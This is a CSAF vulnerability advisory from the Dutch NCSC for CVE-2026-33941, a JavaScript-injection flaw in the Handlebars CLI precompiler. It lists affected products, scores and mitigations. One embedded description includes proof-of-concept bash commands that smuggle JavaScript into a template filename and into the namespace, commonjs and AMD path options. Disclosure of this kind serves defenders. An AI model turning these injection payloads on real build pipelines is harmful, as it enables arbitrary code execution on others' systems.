{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33941", "tracking": { "current_release_date": "2026-03-31T18:25:31.207639Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33941", "initial_release_date": "2026-03-27T20:28:32.354234Z", "revision_history": [ { "date": "2026-03-27T20:28:32.354234Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-27T20:28:42.205972Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-28T07:39:17.901853Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:39:27.131959Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:39:56.738950Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:39:58.805626Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-28T12:27:42.050869Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (31).| Product Identifiers created (10).| Product Remediations created (31).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-28T12:27:46.987453Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-28T12:44:14.711594Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)." }, { "date": "2026-03-28T12:44:18.580647Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:31.273029Z", "number": "11", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-29T00:38:33.176757Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-30T20:47:08.904667Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-31T12:19:58.782204Z", "number": "14", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| CWES updated (1)." }, { "date": "2026-03-31T15:39:04.817097Z", "number": "15", "summary": "Unknown change." }, { "date": "2026-03-31T18:25:25.917567Z", "number": "16", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-31T18:25:29.281843Z", "number": "17", "summary": "NCSC Score updated." } ], "status": "interim", "version": "17" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2524215" } } ], "category": "product_name", "name": "389-ds-base" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459357" } } ], "category": "product_name", "name": "firefox" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1663145" } } ], "category": "product_name", "name": "grafana" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2631284" } } ], "category": "product_name", "name": "mozjs60" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459358" } } ], "category": "product_name", "name": "thunderbird" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2552001", "product_identification_helper": { "cpe": "cpe:/a:redhat:cryostat:4" } } } ], "category": "product_name", "name": "Cryostat 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/5", "product": { "name": "vers:rpm/5", "product_id": "CSAFPID-1459353", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5" } } } ], "category": "product_name", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439292", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_data_grid:8" } } } ], "category": "product_name", "name": "Red Hat Data Grid 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/10", "product": { "name": "vers:rpm/10", "product_id": "CSAFPID-2858634", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:10" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439315", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439317", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:8" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/9", "product": { "name": "vers:rpm/9", "product_id": "CSAFPID-1439319", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:9" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1439279", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_ai" } } } ], "category": "product_name", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441150", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_devspaces:3:" } } } ], "category": "product_name", "name": "Red Hat OpenShift Dev Spaces" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439306", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7" } } } ], "category": "product_name", "name": "Red Hat Process Automation 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467450" } } ], "category": "product_name", "name": "code-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift Dev Spaces" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5187689" } } ], "category": "product_name", "name": "elasticsearch-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914696" } } ], "category": "product_name", "name": "elasticsearch-proxy-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914697" } } ], "category": "product_name", "name": "elasticsearch-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855724" } } ], "category": "product_name", "name": "elasticsearch6-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459355" } } ], "category": "product_name", "name": "kibana6-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855725" } } ], "category": "product_name", "name": "logging-curator5-rhel9" } ], "category": "product_family", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2873478" } } ], "category": "product_name", "name": "firefox" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2876286" } } ], "category": "product_name", "name": "thunderbird" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459356" } } ], "category": "product_name", "name": "firefox" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459360" } } ], "category": "product_name", "name": "firefox" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459361" } } ], "category": "product_name", "name": "thunderbird" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5958193" } } ], "category": "product_name", "name": "handlebars" } ], "category": "product_family", "name": "Cryostat 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5958194" } } ], "category": "product_name", "name": "handlebars" } ], "category": "product_family", "name": "Red Hat Data Grid 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5958195" } } ], "category": "product_name", "name": "handlebars" } ], "category": "product_family", "name": "Red Hat Process Automation 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068114" } } ], "category": "product_name", "name": "odh-workbench-codeserver-datascience-cpu-py312-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift AI (RHOAI)" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=4.0.0|<4.7.9", "product": { "name": "vers:unknown/>=4.0.0|<4.7.9", "product_id": "CSAFPID-5969389", "product_identification_helper": { "cpe": "cpe:2.3:a:handlebarsjs:handlebars:*:*:*:*:*:node.js:*:*" } } } ], "category": "product_name", "name": "Handlebars" } ], "category": "vendor", "name": "Handlebarsjs" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5733329", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:cbl2_reaper_3.1.1-22:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "cbl2 reaper 3.1.1-22 on CBL Mariner 2.0" } ], "category": "product_family", "name": "Open Source Software" } ], "category": "vendor", "name": "Microsoft" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=4.0.0|<4.7.9", "product": { "name": "vers:unknown/>=4.0.0|<4.7.9", "product_id": "CSAFPID-5956278" } } ], "category": "product_name", "name": "handlebars.js" } ], "category": "vendor", "name": "handlebars-lang" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-5958362" } } ], "category": "product_name", "name": "node-handlebars" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-5958363" } } ], "category": "product_name", "name": "node-handlebars" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33941", "cwe": { "id": "CWE-116", "name": "Improper Encoding or Escaping of Output" }, "notes": [ { "category": "description", "text": "## Summary\n\nThe Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser.\n\n## Description\n\n`lib/precompiler.js` generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist:\n\n### 1. Template name injection\n\n```javascript\n// Vulnerable code pattern\noutput += 'templates[\"' + template.name + '\"] = template(...)';\n```\n\n`template.name` is derived from the file system path. A filename containing `\"` or `'];` breaks out of the string literal and injects arbitrary JavaScript.\n\n### 2. Namespace injection (`-n` / `--namespace`)\n\n```javascript\n// Vulnerable code pattern\noutput += 'var templates = ' + opts.namespace + ' = ' + opts.namespace + ' || {};';\n```\n\n`opts.namespace` is emitted as raw JavaScript. Anything after a `;` in the value becomes an additional JavaScript statement.\n\n### 3. CommonJS path injection (`-c` / `--commonjs`)\n\n```javascript\n// Vulnerable code pattern\noutput += 'var Handlebars = require(\"' + opts.commonjs + '\");';\n```\n\n`opts.commonjs` is interpolated inside double quotes with no escaping, allowing `\"` to close the string and inject further code.\n\n### 4. AMD path injection (`-h` / `--handlebarPath`)\n\n```javascript\n// Vulnerable code pattern\noutput += \"define(['\" + opts.handlebarPath + \"handlebars.runtime'], ...)\";\n```\n\n`opts.handlebarPath` is interpolated inside single quotes, allowing `'` to close the array element.\n\nAll four injection points result in code that executes when the generated bundle is `require()`d or loaded in a browser.\n\n## Proof of Concept\n\n**Template name vector (creates a file `pwned` on disk):**\n\n```bash\nmkdir -p templates\nprintf 'Hello' > \"templates/evil'] = (function(){require(\\\"fs\\\").writeFileSync(\\\"pwned\\\",\\\"1\\\")})(); //.handlebars\"\n\nnode bin/handlebars templates -o out.js\nnode -e 'require(\"./out.js\")' # Executes injected code, creates ./pwned\n```\n\n**Namespace vector:**\n\n```bash\nnode bin/handlebars templates -o out.js \\\n -n \"App.ns; require('fs').writeFileSync('pwned2','1'); //\"\nnode -e 'require(\"./out.js\")'\n```\n\n**CommonJS vector:**\n\n```bash\nnode bin/handlebars templates -o out.js \\\n -c 'handlebars\"); require(\"fs\").writeFileSync(\"pwned3\",\"1\"); //'\nnode -e 'require(\"./out.js\")'\n```\n\n**AMD vector:**\n\n```bash\nnode bin/handlebars templates -o out.js -a \\\n -h \"'); require('fs').writeFileSync('pwned4','1'); // \"\nnode -e 'require(\"./out.js\")'\n```\n\n## Workarounds\n\n- **Validate all CLI inputs** before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`\"`, `'`, `;`, etc.).\n- **Use a fixed, trusted namespace string** passed via a configuration file rather than command-line arguments in automated pipelines.\n- **Run the precompiler in a sandboxed environment** (container with no write access to sensitive paths) to limit the impact of successful exploitation.\n- **Audit template filenames** in any repository or package that is consumed by an automated build pipeline.", "title": "github - https://api.github.com/advisories/GHSA-xjpj-3mr7-gcpf" }, { "category": "description", "text": "Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. Version 4.7.9 fixes the issue. Some workarounds are available. First, validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`\"`, `'`, `;`, etc.). Second, use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines. Third, run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation. Fourth, audit template filenames in any repository or package that is consumed by an automated build pipeline.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33941.json" }, { "category": "description", "text": "Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. Version 4.7.9 fixes the issue. Some workarounds are available. First, validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`\"`, `'`, `;`, etc.). Second, use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines. Third, run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation. Fourth, audit template filenames in any repository or package that is consumed by an automated build pipeline.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33941" }, { "category": "description", "text": "A flaw was found in Handlebars. The Handlebars command-line interface (CLI) precompiler concatenates user-controlled strings, such as template file names and CLI options, directly into the generated JavaScript without proper escaping or sanitization. An attacker capable of influencing these inputs can inject arbitrary JavaScript code. This can lead to arbitrary code execution when the generated JavaScript bundle is loaded in a Node.js environment or a web browser.\nImportant: This flaw in Handlebars allows arbitrary code execution when the CLI precompiler processes untrusted inputs. An attacker who can influence template filenames or command-line arguments can inject malicious JavaScript, which executes when the generated bundle is loaded. Red Hat products utilizing the Handlebars CLI precompiler in environments where untrusted inputs are processed may be affected.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33941.json" }, { "category": "description", "text": "Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. Version 4.7.9 fixes the issue. Some workarounds are available. First, validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`\"`, `'`, `;`, etc.). Second, use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines. Third, run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation. Fourth, audit template filenames in any repository or package that is consumed by an automated build pipeline.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33941" }, { "category": "description", "text": "Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options", "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "other", "text": "0.00018", "title": "EPSS" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "Is related to CWE-116 (Improper Encoding or Escaping of Output)", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, There is product_remediation data available from source Redhat, Is related to a product by vendor Red Hat", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5956278", "CSAFPID-1439279", "CSAFPID-1439292", "CSAFPID-1439306", "CSAFPID-1439315", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441150", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1459356", "CSAFPID-1459357", "CSAFPID-1459358", "CSAFPID-1459360", "CSAFPID-1459361", "CSAFPID-1663145", "CSAFPID-2467450", "CSAFPID-2524215", "CSAFPID-2552001", "CSAFPID-2631284", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2873478", "CSAFPID-2876286", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5068114", "CSAFPID-5187689", "CSAFPID-5958193", "CSAFPID-5958194", "CSAFPID-5958195", "CSAFPID-5958362", "CSAFPID-5958363", "CSAFPID-5733329", "CSAFPID-5969389" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-xjpj-3mr7-gcpf" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33941.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33941" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33941.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-33941" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - microsoft", "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-xjpj-3mr7-gcpf" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33941" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33941" } ], "remediations": [ { "category": "mitigation", "details": "To mitigate this issue, ensure all inputs to the Handlebars CLI precompiler are thoroughly validated, rejecting characters with JavaScript string-escaping significance (e.g., \\\" , \\' , ;). For automated build pipelines, configure a fixed and trusted namespace string via a configuration file rather than passing it through command-line arguments. Additionally, consider running the precompiler within a sandboxed environment, such as a container with restricted write access, to limit the potential impact of successful exploitation.", "product_ids": [ "CSAFPID-1439279", "CSAFPID-1439292", "CSAFPID-1439306", "CSAFPID-1439315", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441150", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1459356", "CSAFPID-1459357", "CSAFPID-1459358", "CSAFPID-1459360", "CSAFPID-1459361", "CSAFPID-1663145", "CSAFPID-2467450", "CSAFPID-2524215", "CSAFPID-2552001", "CSAFPID-2631284", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2873478", "CSAFPID-2876286", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5068114", "CSAFPID-5187689", "CSAFPID-5958193", "CSAFPID-5958194", "CSAFPID-5958195" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1439279", "CSAFPID-1439292", "CSAFPID-1439306", "CSAFPID-1439315", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441150", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1459356", "CSAFPID-1459357", "CSAFPID-1459358", "CSAFPID-1459360", "CSAFPID-1459361", "CSAFPID-1663145", "CSAFPID-2467450", "CSAFPID-2524215", "CSAFPID-2552001", "CSAFPID-2631284", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2873478", "CSAFPID-2876286", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5068114", "CSAFPID-5187689", "CSAFPID-5733329", "CSAFPID-5956278", "CSAFPID-5958193", "CSAFPID-5958194", "CSAFPID-5958195", "CSAFPID-5958362", "CSAFPID-5958363", "CSAFPID-5969389" ] } ], "title": "CVE-2026-33941" } ] }